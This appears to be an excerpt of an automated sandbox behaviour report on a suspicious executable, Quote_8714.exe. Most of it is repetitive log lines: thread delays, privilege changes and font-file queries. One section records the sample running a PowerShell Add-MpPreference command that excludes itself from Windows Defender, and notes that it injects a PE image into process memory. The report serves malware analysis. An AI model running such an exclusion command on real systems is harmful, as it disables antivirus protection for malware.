Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 97296	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 97185	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 97078	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 96968	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 96859	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 96750	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 96637	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 96530	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 96421	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 96287	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 96159	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 95799	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 95672	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 95562	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 95453	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 95343	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 95234	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 95125	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 95015	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 94906	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 94796	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 94687	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 94577	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Thread delayed: delay time: 94468	Jump to behavior

Source: Quote_8714.exe, 00000005.00000002.2946197413.0000000005F97000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Quote_8714.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"
Source: C:\Users\user\Desktop\Quote_8714.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Quote_8714.exe

Memory written: C:\Users\user\Desktop\Quote_8714.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote_8714.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Process created: C:\Users\user\Desktop\Quote_8714.exe "C:\Users\user\Desktop\Quote_8714.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Users\user\Desktop\Quote_8714.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_8714.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
